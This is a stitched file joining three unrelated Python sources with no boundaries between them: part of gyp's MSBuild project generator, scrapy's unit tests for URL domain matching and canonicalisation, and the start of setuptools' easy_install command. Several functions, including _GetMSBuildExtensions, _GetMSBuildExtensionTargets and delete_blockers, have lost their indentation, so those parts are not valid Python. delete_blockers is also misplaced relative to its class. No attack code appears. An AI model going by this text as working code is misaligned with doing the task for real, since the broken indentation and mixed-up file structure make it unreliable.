  # TODO(jeanluc) Validate & warn that we don't translate
  # prebuild = configuration.get('msvs_prebuild')
  # postbuild = configuration.get('msvs_postbuild')
  def_file = _GetModuleDefinition(spec)
  precompiled_header = configuration.get('msvs_precompiled_header')

  # Add the information to the appropriate tool
  # TODO(jeanluc) We could optimize and generate these settings only if
  # the corresponding files are found, e.g. don't generate ResourceCompile
  # if you don't have any resources.
  _ToolAppend(msbuild_settings, 'ClCompile',
              'AdditionalIncludeDirectories', include_dirs)
  _ToolAppend(msbuild_settings, 'ResourceCompile',
              'AdditionalIncludeDirectories', resource_include_dirs)
  # Add in libraries, note that even for empty libraries, we want this
  # set, to prevent inheriting default libraries from the enviroment.
  _ToolSetOrAppend(msbuild_settings, 'Link', 'AdditionalDependencies',
                  libraries)
  _ToolAppend(msbuild_settings, 'Link', 'AdditionalLibraryDirectories',
              library_dirs)
  if out_file:
    _ToolAppend(msbuild_settings, msbuild_tool, 'OutputFile', out_file,
                only_if_unset=True)
  if target_ext:
    _ToolAppend(msbuild_settings, msbuild_tool, 'TargetExt', target_ext,
                only_if_unset=True)
  # Add defines.
  _ToolAppend(msbuild_settings, 'ClCompile',
              'PreprocessorDefinitions', defines)
  _ToolAppend(msbuild_settings, 'ResourceCompile',
              'PreprocessorDefinitions', defines)
  # Add disabled warnings.
  _ToolAppend(msbuild_settings, 'ClCompile',
              'DisableSpecificWarnings', disabled_warnings)
  # Turn on precompiled headers if appropriate.
  if precompiled_header:
    precompiled_header = os.path.split(precompiled_header)[1]
    _ToolAppend(msbuild_settings, 'ClCompile', 'PrecompiledHeader', 'Use')
    _ToolAppend(msbuild_settings, 'ClCompile',
                'PrecompiledHeaderFile', precompiled_header)
    _ToolAppend(msbuild_settings, 'ClCompile',
                'ForcedIncludeFiles', [precompiled_header])
  # Loadable modules don't generate import libraries;
  # tell dependent projects to not expect one.
  if spec['type'] == 'loadable_module':
    _ToolAppend(msbuild_settings, '', 'IgnoreImportLibrary', 'true')
  # Set the module definition file if any.
  if def_file:
    _ToolAppend(msbuild_settings, 'Link', 'ModuleDefinitionFile', def_file)
  configuration['finalized_msbuild_settings'] = msbuild_settings
def _GetValueFormattedForMSBuild(tool_name, name, value):
  """Formats a setting value for inclusion in the MSBuild project XML.

  Arguments:
    tool_name: The tool the setting belongs to ('' for global settings).
    name: The setting name.
    value: The raw value; lists are joined with the tool-appropriate
        separator, scalars are converted directly.
  Returns:
    The formatted string value.
  """
  if type(value) == list:
    # For some settings, VS2010 does not automatically extends the settings
    # TODO(jeanluc) Is this what we want?
    if name in ['AdditionalIncludeDirectories',
                'AdditionalLibraryDirectories',
                'AdditionalOptions',
                'DelayLoadDLLs',
                'DisableSpecificWarnings',
                'PreprocessorDefinitions']:
      # Build a copy instead of value.append(...): appending mutated the
      # caller's list, so formatting the same setting twice accumulated
      # duplicate '%(Name)' inheritance markers.
      value = value + ['%%(%s)' % name]
    # For most tools, entries in a list should be separated with ';' but some
    # settings use a space. Check for those first.
    exceptions = {
        'ClCompile': ['AdditionalOptions'],
        'Link': ['AdditionalOptions'],
        'Lib': ['AdditionalOptions']}
    if tool_name in exceptions and name in exceptions[tool_name]:
      char = ' '
    else:
      char = ';'
    formatted_value = char.join(
        [MSVSSettings.ConvertVCMacrosToMSBuild(i) for i in value])
  else:
    formatted_value = MSVSSettings.ConvertVCMacrosToMSBuild(value)
  return formatted_value
def _VerifySourcesExist(sources, root_dir):
  """Verifies that all source files exist on disk.

  Checks that all regular source files, i.e. not created at run time,
  exist on disk. Missing files cause needless recompilation but no otherwise
  visible errors.

  Arguments:
    sources: A recursive list of Filter/file names.
    root_dir: The root directory for the relative path names.
  Returns:
    A list of source files that cannot be found on disk.
  """
  missing_sources = []
  for source in sources:
    if isinstance(source, MSVSProject.Filter):
      # Recurse into filter (folder) nodes.
      missing_sources += _VerifySourcesExist(source.contents, root_dir)
    elif '$' not in source:
      # A '$' means the path embeds a macro, so it cannot be checked as a
      # literal file name here.
      full_path = os.path.join(root_dir, source)
      if not os.path.exists(full_path):
        missing_sources.append(full_path)
  return missing_sources
def _GetMSBuildSources(spec, sources, exclusions, extension_to_rule_name,
                       actions_spec, sources_handled_by_action, list_excluded):
  """Returns the ItemGroup elements describing the target's sources."""
  groups = ['none', 'midl', 'include', 'compile', 'resource', 'rule']
  grouped_sources = dict((g, []) for g in groups)
  _AddSources2(spec, sources, exclusions, grouped_sources,
               extension_to_rule_name, sources_handled_by_action,
               list_excluded)
  result = []
  # Preserve the fixed group order; skip empty groups.
  for g in groups:
    if grouped_sources[g]:
      result.append(['ItemGroup'] + grouped_sources[g])
  if actions_spec:
    result.append(['ItemGroup'] + actions_spec)
  return result
def _AddSources2(spec, sources, exclusions, grouped_sources,
                 extension_to_rule_name, sources_handled_by_action,
                 list_excluded):
  """Recursively distributes sources into grouped_sources by MSBuild type.

  For each source not already handled by an action this appends an element
  (with ExcludedFromBuild / PrecompiledHeader details as needed) to the
  appropriate group in grouped_sources.
  """
  extensions_excluded_from_precompile = []
  for source in sources:
    if isinstance(source, MSVSProject.Filter):
      # Recurse into filter (folder) nodes.
      _AddSources2(spec, source.contents, exclusions, grouped_sources,
                   extension_to_rule_name, sources_handled_by_action,
                   list_excluded)
    else:
      if not source in sources_handled_by_action:
        detail = []
        excluded_configurations = exclusions.get(source, [])
        # Excluded from every configuration -> one unconditional entry;
        # otherwise one conditional entry per excluding configuration.
        if len(excluded_configurations) == len(spec['configurations']):
          detail.append(['ExcludedFromBuild', 'true'])
        else:
          for config_name, configuration in sorted(excluded_configurations):
            condition = _GetConfigurationCondition(config_name, configuration)
            detail.append(['ExcludedFromBuild',
                           {'Condition': condition},
                           'true'])
        # Add precompile if needed
        for config_name, configuration in spec['configurations'].iteritems():
          precompiled_source = configuration.get('msvs_precompiled_source', '')
          if precompiled_source != '':
            precompiled_source = _FixPath(precompiled_source)
            if not extensions_excluded_from_precompile:
              # If the precompiled header is generated by a C source, we must
              # not try to use it for C++ sources, and vice versa.
              basename, extension = os.path.splitext(precompiled_source)
              if extension == '.c':
                extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
              else:
                extensions_excluded_from_precompile = ['.c']

            if precompiled_source == source:
              condition = _GetConfigurationCondition(config_name,
                                                     configuration)
              detail.append(['PrecompiledHeader',
                             {'Condition': condition},
                             'Create'
                            ])
            else:
              # Turn off precompiled header usage for source files of a
              # different type than the file that generated the
              # precompiled header.
              for extension in extensions_excluded_from_precompile:
                if source.endswith(extension):
                  detail.append(['PrecompiledHeader', ''])
                  detail.append(['ForcedIncludeFiles', ''])

        group, element = _MapFileToMsBuildSourceType(source,
                                                     extension_to_rule_name)
        grouped_sources[group].append([element, {'Include': source}] + detail)
def _GetMSBuildProjectReferences(project):
  """Returns ProjectReference elements for the project's dependencies."""
  if not project.dependencies:
    return []
  group = ['ItemGroup']
  project_dir = os.path.split(project.path)[0]
  for dependency in project.dependencies:
    relative_path = gyp.common.RelativePath(dependency.path, project_dir)
    project_ref = ['ProjectReference',
                   {'Include': relative_path},
                   ['Project', dependency.guid],
                   ['ReferenceOutputAssembly', 'false']
                  ]
    for config in dependency.spec.get('configurations', {}).itervalues():
      # If it's disabled in any config, turn it off in the reference.
      if config.get('msvs_2010_disable_uldi_when_referenced', 0):
        project_ref.append(['UseLibraryDependencyInputs', 'false'])
        break
    group.append(project_ref)
  return [group]
def _GenerateMSBuildProject(project, options, version, generator_flags):
    """Generate the .vcxproj file (plus its .filters file) for one target.

    Arguments:
      project: the project object to generate (provides spec, path, guid,
          build_file, dependencies, msbuild_toolset).
      options: generator options.
      version: the MSVS version object (used for ToolsVersion).
      generator_flags: dict of generator-specific flags.
    Returns:
      The list of source files that could not be found on disk
      (as reported by _VerifySourcesExist).
    """
    spec = project.spec
    configurations = spec['configurations']
    project_dir, project_file_name = os.path.split(project.path)
    gyp.common.EnsureDirExists(project.path)
    # Prepare list of sources and excluded sources.
    gyp_path = _NormalizedSource(project.build_file)
    relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)

    gyp_file = os.path.split(project.build_file)[1]
    sources, excluded_sources = _PrepareListOfSources(spec, generator_flags,
                                                      gyp_file)
    # Add rules.
    actions_to_add = {}
    props_files_of_rules = set()
    targets_files_of_rules = set()
    extension_to_rule_name = {}
    list_excluded = generator_flags.get('msvs_list_excluded_files', True)

    # Don't generate rules if we are using an external builder like ninja.
    if not spec.get('msvs_external_builder'):
        _GenerateRulesForMSBuild(project_dir, options, spec,
                                 sources, excluded_sources,
                                 props_files_of_rules, targets_files_of_rules,
                                 actions_to_add, extension_to_rule_name)
    else:
        rules = spec.get('rules', [])
        _AdjustSourcesForRules(spec, rules, sources, excluded_sources)

    sources, excluded_sources, excluded_idl = (
        _AdjustSourcesAndConvertToFilterHierarchy(spec, options,
                                                  project_dir, sources,
                                                  excluded_sources,
                                                  list_excluded, version))

    # Don't add actions if we are using an external builder like ninja.
    if not spec.get('msvs_external_builder'):
        _AddActions(actions_to_add, spec, project.build_file)
        _AddCopies(actions_to_add, spec)

        # NOTE: this stanza must appear after all actions have been decided.
        # Don't excluded sources with actions attached, or they won't run.
        excluded_sources = _FilterActionsFromExcluded(
            excluded_sources, actions_to_add)

    exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
    actions_spec, sources_handled_by_action = _GenerateActionsForMSBuild(
        spec, actions_to_add)

    _GenerateMSBuildFiltersFile(project.path + '.filters', sources,
                                extension_to_rule_name)
    missing_sources = _VerifySourcesExist(sources, project_dir)

    for configuration in configurations.itervalues():
        _FinalizeMSBuildSettings(spec, configuration)

    # Add attributes to root element

    import_default_section = [
        ['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.Default.props'}]]
    import_cpp_props_section = [
        ['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.props'}]]
    import_cpp_targets_section = [
        ['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.targets'}]]
    macro_section = [['PropertyGroup', {'Label': 'UserMacros'}]]

    # The ordering of these sections mirrors the layout MSBuild expects in a
    # .vcxproj file; do not reorder them.
    content = [
        'Project',
        {'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003',
         'ToolsVersion': version.ProjectVersion(),
         'DefaultTargets': 'Build'
         }]

    content += _GetMSBuildProjectConfigurations(configurations)
    content += _GetMSBuildGlobalProperties(spec, project.guid, project_file_name)
    content += import_default_section
    content += _GetMSBuildConfigurationDetails(spec, project.build_file)
    content += _GetMSBuildLocalProperties(project.msbuild_toolset)
    content += import_cpp_props_section
    content += _GetMSBuildExtensions(props_files_of_rules)
    content += _GetMSBuildPropertySheets(configurations)
    content += macro_section
    content += _GetMSBuildConfigurationGlobalProperties(spec, configurations,
                                                        project.build_file)
    content += _GetMSBuildToolSettingsSections(spec, configurations)
    content += _GetMSBuildSources(
        spec, sources, exclusions, extension_to_rule_name, actions_spec,
        sources_handled_by_action, list_excluded)
    content += _GetMSBuildProjectReferences(project)
    content += import_cpp_targets_section
    content += _GetMSBuildExtensionTargets(targets_files_of_rules)

    if spec.get('msvs_external_builder'):
        content += _GetMSBuildExternalBuilderTargets(spec)

    # TODO(jeanluc) File a bug to get rid of runas.  We had in MSVS:
    # has_run_as = _WriteMSVSUserFile(project.path, version, spec)

    easy_xml.WriteXmlIfChanged(content, project.path, pretty=True, win32=True)

    return missing_sources
def _GetMSBuildExternalBuilderTargets(spec):
    """Return a list of MSBuild targets for external builders.

    Right now, only "Build" and "Clean" targets are generated.

    Arguments:
      spec: The gyp target spec.
    Returns:
      List of MSBuild 'Target' specs.
    """
    targets = []
    # Each target simply Execs the corresponding external-builder command.
    for target_name, cmd_key in (('Build', 'msvs_external_builder_build_cmd'),
                                 ('Clean', 'msvs_external_builder_clean_cmd')):
        cmd = _BuildCommandLineForRuleRaw(
            spec, spec[cmd_key], False, False, False, False)
        targets.append(['Target', {'Name': target_name},
                        ['Exec', {'Command': cmd}]])
    return targets
def _GetMSBuildExtensions(props_files_of_rules):
extensions = ['ImportGroup', {'Label': 'ExtensionSettings'}]
for props_file in props_files_of_rules:
extensions.append(['Import', {'Project': props_file}])
return [extensions]
def _GetMSBuildExtensionTargets(targets_files_of_rules):
targets_node = ['ImportGroup', {'Label': 'ExtensionTargets'}]
for targets_file in sorted(targets_files_of_rules):
targets_node.append(['Import', {'Project': targets_file}])
return [targets_node]
def _GenerateActionsForMSBuild(spec, actions_to_add):
    """Add actions accumulated into an actions_to_add, merging as needed.

    Arguments:
      spec: the target project dict
      actions_to_add: dictionary keyed on input name, which maps to a list of
          dicts describing the actions attached to that input file.

    Returns:
      A pair of (action specification, the sources handled by this action).
    """
    sources_handled_by_action = OrderedSet()
    actions_spec = []
    for primary_input, actions in actions_to_add.iteritems():
        inputs = OrderedSet()
        outputs = OrderedSet()
        descriptions = []
        commands = []
        for action in actions:
            inputs.update(OrderedSet(action['inputs']))
            outputs.update(OrderedSet(action['outputs']))
            descriptions.append(action['description'])
            # For most actions, add 'call' so that actions that invoke batch
            # files return and continue executing.  msbuild_use_call provides
            # a way to disable this but I have not seen any adverse effect
            # from doing that for everything.
            prefix = 'call ' if action.get('msbuild_use_call', True) else ''
            commands.append(prefix + action['command'])
        # Add the custom build action for one input file.
        description = ', and also '.join(descriptions)
        # We can't join the commands simply with && because the command line
        # will get too long.  See also _AddActions: cygwin's setup_env mustn't
        # be called for every invocation or the command that sets the PATH
        # will grow too long.
        separator = '\r\nif %errorlevel% neq 0 exit /b %errorlevel%\r\n'
        _AddMSBuildAction(spec,
                          primary_input,
                          inputs,
                          outputs,
                          separator.join(commands),
                          description,
                          sources_handled_by_action,
                          actions_spec)
    return actions_spec, sources_handled_by_action
def _AddMSBuildAction(spec, primary_input, inputs, outputs, cmd, description,
                      sources_handled_by_action, actions_spec):
    """Append one CustomBuild spec for `primary_input` onto actions_spec,
    and record the input in sources_handled_by_action."""
    command = MSVSSettings.ConvertVCMacrosToMSBuild(cmd)
    primary_input = _FixPath(primary_input)
    inputs_array = _FixPaths(inputs)
    outputs_array = _FixPaths(outputs)
    # Every input other than the primary one becomes an AdditionalInput.
    additional_inputs = ';'.join(i for i in inputs_array
                                 if i != primary_input)
    sources_handled_by_action.add(primary_input)
    action_spec = ['CustomBuild', {'Include': primary_input},
                   # TODO(jeanluc) 'Document' for all or just if as_sources?
                   ['FileType', 'Document'],
                   ['Command', command],
                   ['Message', description],
                   ['Outputs', ';'.join(outputs_array)]
                   ]
    if additional_inputs:
        action_spec.append(['AdditionalInputs', additional_inputs])
    actions_spec.append(action_spec)
import unittest
from scrapy.spiders import Spider
from scrapy.utils.url import url_is_from_any_domain, url_is_from_spider, canonicalize_url
# Modules whose doctests the scrapy test runner should also collect.
__doctests__ = ['scrapy.utils.url']
class UrlUtilsTest(unittest.TestCase):
    """Unit tests for scrapy.utils.url helpers: url_is_from_any_domain,
    url_is_from_spider and canonicalize_url."""

    def test_url_is_from_any_domain(self):
        # Exact domain matches (with and without 'www.'); a suffix of the
        # domain must NOT match.
        url = 'http://www.wheele-bin-art.co.uk/get/product/123'
        self.assertTrue(url_is_from_any_domain(url, ['wheele-bin-art.co.uk']))
        self.assertFalse(url_is_from_any_domain(url, ['art.co.uk']))

        url = 'http://wheele-bin-art.co.uk/get/product/123'
        self.assertTrue(url_is_from_any_domain(url, ['wheele-bin-art.co.uk']))
        self.assertFalse(url_is_from_any_domain(url, ['art.co.uk']))

        # Domain comparison is case-insensitive in both directions.
        url = 'http://www.Wheele-Bin-Art.co.uk/get/product/123'
        self.assertTrue(url_is_from_any_domain(url, ['wheele-bin-art.CO.UK']))
        self.assertTrue(url_is_from_any_domain(url, ['WHEELE-BIN-ART.CO.UK']))

        # The port is part of the netloc and must match when given.
        url = 'http://192.169.0.15:8080/mypage.html'
        self.assertTrue(url_is_from_any_domain(url, ['192.169.0.15:8080']))
        self.assertFalse(url_is_from_any_domain(url, ['192.169.0.15']))

        # javascript: pseudo-URLs never belong to a domain.
        url = 'javascript:%20document.orderform_2581_1190810811.mode.value=%27add%27;%20javascript:%20document.orderform_2581_1190810811.submit%28%29'
        self.assertFalse(url_is_from_any_domain(url, ['testdomain.com']))
        self.assertFalse(url_is_from_any_domain(url+'.testdomain.com', ['testdomain.com']))

    def test_url_is_from_spider(self):
        # With no allowed_domains, the spider name acts as its domain.
        spider = Spider(name='example.com')
        self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', spider))
        self.assertTrue(url_is_from_spider('http://sub.example.com/some/page.html', spider))
        self.assertFalse(url_is_from_spider('http://www.example.org/some/page.html', spider))
        self.assertFalse(url_is_from_spider('http://www.example.net/some/page.html', spider))

    def test_url_is_from_spider_class_attributes(self):
        # Same behaviour when passing the spider class instead of an instance.
        class MySpider(Spider):
            name = 'example.com'
        self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', MySpider))
        self.assertTrue(url_is_from_spider('http://sub.example.com/some/page.html', MySpider))
        self.assertFalse(url_is_from_spider('http://www.example.org/some/page.html', MySpider))
        self.assertFalse(url_is_from_spider('http://www.example.net/some/page.html', MySpider))

    def test_url_is_from_spider_with_allowed_domains(self):
        # allowed_domains extend (not replace) the domain implied by the name.
        spider = Spider(name='example.com', allowed_domains=['example.org', 'example.net'])
        self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', spider))
        self.assertTrue(url_is_from_spider('http://sub.example.com/some/page.html', spider))
        self.assertTrue(url_is_from_spider('http://example.com/some/page.html', spider))
        self.assertTrue(url_is_from_spider('http://www.example.org/some/page.html', spider))
        self.assertTrue(url_is_from_spider('http://www.example.net/some/page.html', spider))
        self.assertFalse(url_is_from_spider('http://www.example.us/some/page.html', spider))

        # allowed_domains may be any iterable: set or tuple work like a list.
        spider = Spider(name='example.com', allowed_domains=set(('example.com', 'example.net')))
        self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', spider))

        spider = Spider(name='example.com', allowed_domains=('example.com', 'example.net'))
        self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', spider))

    def test_url_is_from_spider_with_allowed_domains_class_attributes(self):
        # Class-level allowed_domains behave the same as instance-level ones.
        class MySpider(Spider):
            name = 'example.com'
            allowed_domains = ('example.org', 'example.net')
        self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', MySpider))
        self.assertTrue(url_is_from_spider('http://sub.example.com/some/page.html', MySpider))
        self.assertTrue(url_is_from_spider('http://example.com/some/page.html', MySpider))
        self.assertTrue(url_is_from_spider('http://www.example.org/some/page.html', MySpider))
        self.assertTrue(url_is_from_spider('http://www.example.net/some/page.html', MySpider))
        self.assertFalse(url_is_from_spider('http://www.example.us/some/page.html', MySpider))

    def test_canonicalize_url(self):
        # simplest case
        self.assertEqual(canonicalize_url("http://www.example.com/"),
                         "http://www.example.com/")

        # always return a str
        assert isinstance(canonicalize_url(u"http://www.example.com"), str)

        # append missing path
        self.assertEqual(canonicalize_url("http://www.example.com"),
                         "http://www.example.com/")
        # typical usage
        self.assertEqual(canonicalize_url("http://www.example.com/do?a=1&b=2&c=3"),
                         "http://www.example.com/do?a=1&b=2&c=3")
        self.assertEqual(canonicalize_url("http://www.example.com/do?c=1&b=2&a=3"),
                         "http://www.example.com/do?a=3&b=2&c=1")
        self.assertEqual(canonicalize_url("http://www.example.com/do?&a=1"),
                         "http://www.example.com/do?a=1")

        # sorting by argument values
        self.assertEqual(canonicalize_url("http://www.example.com/do?c=3&b=5&b=2&a=50"),
                         "http://www.example.com/do?a=50&b=2&b=5&c=3")

        # using keep_blank_values
        self.assertEqual(canonicalize_url("http://www.example.com/do?b=&a=2", keep_blank_values=False),
                         "http://www.example.com/do?a=2")
        self.assertEqual(canonicalize_url("http://www.example.com/do?b=&a=2"),
                         "http://www.example.com/do?a=2&b=")
        self.assertEqual(canonicalize_url("http://www.example.com/do?b=&c&a=2", keep_blank_values=False),
                         "http://www.example.com/do?a=2")
        self.assertEqual(canonicalize_url("http://www.example.com/do?b=&c&a=2"),
                         "http://www.example.com/do?a=2&b=&c=")

        self.assertEqual(canonicalize_url(u'http://www.example.com/do?1750,4'),
                         'http://www.example.com/do?1750%2C4=')

        # spaces
        self.assertEqual(canonicalize_url("http://www.example.com/do?q=a space&a=1"),
                         "http://www.example.com/do?a=1&q=a+space")
        self.assertEqual(canonicalize_url("http://www.example.com/do?q=a+space&a=1"),
                         "http://www.example.com/do?a=1&q=a+space")
        self.assertEqual(canonicalize_url("http://www.example.com/do?q=a%20space&a=1"),
                         "http://www.example.com/do?a=1&q=a+space")

        # normalize percent-encoding case (in paths)
        # NOTE(review): the stray trailing comma below makes this statement a
        # 1-tuple expression; harmless, left as-is to keep the code unchanged.
        self.assertEqual(canonicalize_url("http://www.example.com/a%a3do"),
                         "http://www.example.com/a%A3do"),
        # normalize percent-encoding case (in query arguments)
        self.assertEqual(canonicalize_url("http://www.example.com/do?k=b%a3"),
                         "http://www.example.com/do?k=b%A3")

        # non-ASCII percent-encoding in paths
        self.assertEqual(canonicalize_url("http://www.example.com/a do?a=1"),
                         "http://www.example.com/a%20do?a=1"),
        self.assertEqual(canonicalize_url("http://www.example.com/a %20do?a=1"),
                         "http://www.example.com/a%20%20do?a=1"),
        self.assertEqual(canonicalize_url("http://www.example.com/a do\xc2\xa3.html?a=1"),
                         "http://www.example.com/a%20do%C2%A3.html?a=1")
        # non-ASCII percent-encoding in query arguments
        self.assertEqual(canonicalize_url(u"http://www.example.com/do?price=\xa3500&a=5&z=3"),
                         u"http://www.example.com/do?a=5&price=%C2%A3500&z=3")
        self.assertEqual(canonicalize_url("http://www.example.com/do?price=\xc2\xa3500&a=5&z=3"),
                         "http://www.example.com/do?a=5&price=%C2%A3500&z=3")
        self.assertEqual(canonicalize_url("http://www.example.com/do?price(\xc2\xa3)=500&a=1"),
                         "http://www.example.com/do?a=1&price%28%C2%A3%29=500")

        # urls containing auth and ports
        self.assertEqual(canonicalize_url(u"http://user:pass@www.example.com:81/do?now=1"),
                         u"http://user:pass@www.example.com:81/do?now=1")

        # remove fragments
        self.assertEqual(canonicalize_url(u"http://user:pass@www.example.com/do?a=1#frag"),
                         u"http://user:pass@www.example.com/do?a=1")
        self.assertEqual(canonicalize_url(u"http://user:pass@www.example.com/do?a=1#frag", keep_fragments=True),
                         u"http://user:pass@www.example.com/do?a=1#frag")

        # dont convert safe characters to percent encoding representation
        self.assertEqual(canonicalize_url(
            "http://www.simplybedrooms.com/White-Bedroom-Furniture/Bedroom-Mirror:-Josephine-Cheval-Mirror.html"),
            "http://www.simplybedrooms.com/White-Bedroom-Furniture/Bedroom-Mirror:-Josephine-Cheval-Mirror.html")

        # urllib.quote uses a mapping cache of encoded characters. when parsing
        # an already percent-encoded url, it will fail if that url was not
        # percent-encoded as utf-8, that's why canonicalize_url must always
        # convert the urls to string. the following test asserts that
        # functionality.
        self.assertEqual(canonicalize_url(u'http://www.example.com/caf%E9-con-leche.htm'),
                         'http://www.example.com/caf%E9-con-leche.htm')

        # domains are case insensitive
        self.assertEqual(canonicalize_url("http://www.EXAMPLE.com/"),
                         "http://www.example.com/")

        # quoted slash and question sign
        self.assertEqual(canonicalize_url("http://foo.com/AC%2FDC+rocks%3f/?yeah=1"),
                         "http://foo.com/AC%2FDC+rocks%3F/?yeah=1")
        self.assertEqual(canonicalize_url("http://foo.com/AC%2FDC/"),
                         "http://foo.com/AC%2FDC/")
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    unittest.main()
#!/usr/bin/env python
"""
Easy Install
------------
A tool for doing automatic download/extract/build of distutils-based Python
packages. For detailed documentation, see the accompanying EasyInstall.txt
file, or visit the `EasyInstall home page`__.
__ https://pythonhosted.org/setuptools/easy_install.html
"""
from glob import glob
from distutils.util import get_platform
from distutils.util import convert_path, subst_vars
from distutils.errors import DistutilsArgError, DistutilsOptionError, \
DistutilsError, DistutilsPlatformError
from distutils.command.install import INSTALL_SCHEMES, SCHEME_KEYS
from distutils import log, dir_util
from distutils.command.build_scripts import first_line_re
import sys
import os
import zipimport
import shutil
import tempfile
import zipfile
import re
import stat
import random
import platform
import textwrap
import warnings
import site
import struct
import contextlib
import subprocess
import shlex
from setuptools import Command
from setuptools.sandbox import run_setup
from setuptools.py31compat import get_path, get_config_vars
from setuptools.command import setopt
from setuptools.archive_util import unpack_archive
from setuptools.package_index import PackageIndex
from setuptools.package_index import URL_SCHEME
from setuptools.command import bdist_egg, egg_info
from setuptools.compat import (iteritems, maxsize, basestring, unicode,
reraise, PY2, PY3)
from pkg_resources import (
yield_lines, normalize_path, resource_string, ensure_directory,
get_distribution, find_distributions, Environment, Requirement,
Distribution, PathMetadata, EggMetadata, WorkingSet, DistributionNotFound,
VersionConflict, DEVELOP_DIST,
)
import pkg_resources
# Turn on PEP440Warnings
warnings.filterwarnings("default", category=pkg_resources.PEP440Warning)

# Public API of this module.
__all__ = [
    'samefile', 'easy_install', 'PthDistributions', 'extract_wininst_cfg',
    'main', 'get_exe_prefixes',
]
def is_64bit():
    """Return True when the running interpreter uses 64-bit pointers."""
    pointer_bits = struct.calcsize("P") * 8
    return pointer_bits == 64
def samefile(p1, p2):
    """Return True when p1 and p2 refer to the same file.

    Uses os.path.samefile when both paths exist (and the platform supports
    it); otherwise falls back to comparing normalized path strings.
    """
    can_use_samefile = (hasattr(os.path, 'samefile')
                        and os.path.exists(p1)
                        and os.path.exists(p2))
    if can_use_samefile:
        return os.path.samefile(p1, p2)

    def _canonical(path):
        return os.path.normpath(os.path.normcase(path))

    return _canonical(p1) == _canonical(p2)
# ASCII helpers differ between Python 2 (where str is bytes) and Python 3
# (where str must be explicitly encoded).
if PY2:
    def _to_ascii(s):
        """On Python 2, str is already a byte string; return unchanged."""
        return s

    def isascii(s):
        """Return True when `s` decodes cleanly as ASCII."""
        try:
            unicode(s, 'ascii')
        except UnicodeError:
            return False
        return True
else:
    def _to_ascii(s):
        """Encode `s` to an ASCII byte string."""
        return s.encode('ascii')

    def isascii(s):
        """Return True when `s` encodes cleanly as ASCII."""
        try:
            s.encode('ascii')
        except UnicodeError:
            return False
        return True
class easy_install(Command):
    """Manage a download/build/install process"""

    description = "Find/get/install Python packages"
    # distutils passes leftover command-line args to this command as requirements.
    command_consumes_arguments = True

    user_options = [
        ('prefix=', None, "installation prefix"),
        ("zip-ok", "z", "install package as a zipfile"),
        ("multi-version", "m", "make apps have to require() a version"),
        ("upgrade", "U", "force upgrade (searches PyPI for latest versions)"),
        ("install-dir=", "d", "install package to DIR"),
        ("script-dir=", "s", "install scripts to DIR"),
        ("exclude-scripts", "x", "Don't install scripts"),
        ("always-copy", "a", "Copy all needed packages to install dir"),
        ("index-url=", "i", "base URL of Python Package Index"),
        ("find-links=", "f", "additional URL(s) to search for packages"),
        ("build-directory=", "b",
         "download/extract/build in DIR; keep the results"),
        ('optimize=', 'O',
         "also compile with optimization: -O1 for \"python -O\", "
         "-O2 for \"python -OO\", and -O0 to disable [default: -O0]"),
        ('record=', None,
         "filename in which to record list of installed files"),
        ('always-unzip', 'Z', "don't install as a zipfile, no matter what"),
        ('site-dirs=', 'S', "list of directories where .pth files work"),
        ('editable', 'e', "Install specified packages in editable form"),
        ('no-deps', 'N', "don't install dependencies"),
        ('allow-hosts=', 'H', "pattern(s) that hostnames must match"),
        ('local-snapshots-ok', 'l',
         "allow building eggs from local checkouts"),
        ('version', None, "print version information and exit"),
        ('no-find-links', None,
         "Don't load find-links defined in packages being installed")
    ]

    boolean_options = [
        'zip-ok', 'multi-version', 'exclude-scripts', 'upgrade', 'always-copy',
        'editable',
        'no-deps', 'local-snapshots-ok', 'version'
    ]

    # The --user option only exists when the interpreter supports per-user
    # site-packages (site.ENABLE_USER_SITE).
    if site.ENABLE_USER_SITE:
        help_msg = "install in user site-package '%s'" % site.USER_SITE
        user_options.append(('user', None, help_msg))
        boolean_options.append('user')

    # --always-unzip is the negation of --zip-ok.
    negative_opt = {'always-unzip': 'zip-ok'}

    # Factory for the package index; subclasses may override.
    create_index = PackageIndex
    def initialize_options(self):
        """Set every option attribute to its pre-parse default."""
        # Default --user to on when running from within the user site dir.
        if site.ENABLE_USER_SITE:
            whereami = os.path.abspath(__file__)
            self.user = whereami.startswith(site.USER_SITE)
        else:
            self.user = 0

        self.zip_ok = self.local_snapshots_ok = None
        self.install_dir = self.script_dir = self.exclude_scripts = None
        self.index_url = None
        self.find_links = None
        self.build_directory = None
        self.args = None
        self.optimize = self.record = None
        self.upgrade = self.always_copy = self.multi_version = None
        self.editable = self.no_deps = self.allow_hosts = None
        self.root = self.prefix = self.no_report = None
        self.version = None
        self.install_purelib = None  # for pure module distributions
        self.install_platlib = None  # non-pure (dists w/ extensions)
        self.install_headers = None  # for C/C++ headers
        self.install_lib = None  # set to either purelib or platlib
        self.install_scripts = None
        self.install_data = None
        self.install_base = None
        self.install_platbase = None
        if site.ENABLE_USER_SITE:
            self.install_userbase = site.USER_BASE
            self.install_usersite = site.USER_SITE
        else:
            self.install_userbase = None
            self.install_usersite = None
        self.no_find_links = None

        # Options not specifiable via command line
        self.package_index = None
        self.pth_file = self.always_copy_from = None
        self.site_dirs = None
        self.installed_projects = {}
        self.sitepy_installed = False
        # Always read easy_install options, even if we are subclassed, or have
        # an independent instance created. This ensures that defaults will
        # always come from the standard configuration file(s)' "easy_install"
        # section, even if this is a "develop" or "install" command, or some
        # other embedding.
        self._dry_run = None
        self.verbose = self.distribution.verbose
        self.distribution._set_command_options(
            self, self.distribution.get_option_dict('easy_install')
        )
def delete_blockers(self, blockers):
for filename in blockers:
if os.path.exists(filename) or os.path.islink(filename):
log.info("Deleting %s", filename)
if not self.dry_run:
if (os.path.isdir(filename) and
not os.path.islink(filename)):
rmtree(filename)
else:
os.unlink(filename)
    def finalize_options(self):
